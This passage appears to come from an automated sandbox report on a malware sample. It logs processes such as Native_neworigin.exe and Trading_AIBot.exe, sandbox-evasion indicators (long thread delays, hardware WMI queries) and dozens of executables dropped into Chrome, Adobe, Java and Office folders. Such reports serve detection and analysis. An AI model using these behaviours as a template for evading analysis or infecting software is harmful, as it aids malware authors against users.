                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2AD0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 3000000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2E00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 600000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 2350000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 4350000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 5990000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 2D990000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2BB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2D40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 4D40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: CF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 2810000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 4810000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 1200000
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 1199861
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 1199737
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 1199475
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 1198803
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 1198580
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 1198358
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 1198228
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 1198114
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 1197990
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 1197862
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 1197676
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 1197542
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 1197409
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Window / User API: threadDelayed 3758
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Window / User API: threadDelayed 435
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4202
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe
                      Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeDropped PE file which has not been started: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeDropped PE file which has not been started: C:\Windows\System32\FXSSVC.exeJump to dropped file
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                      Source: C:\Users\Public\alpha.exe API coverage: 8.3 %
                      Source: C:\Users\Public\alpha.exe API coverage: 8.5 %
                      Source: C:\Users\Public\kn.exe API coverage: 0.8 %
                      Source: C:\Users\Public\alpha.exe API coverage: 9.6 %
                      Source: C:\Users\Public\alpha.exe API coverage: 9.7 %
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Last function: Thread delayed
                      Source: C:\Windows\System32\alg.exe Last function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Last function: Thread delayed
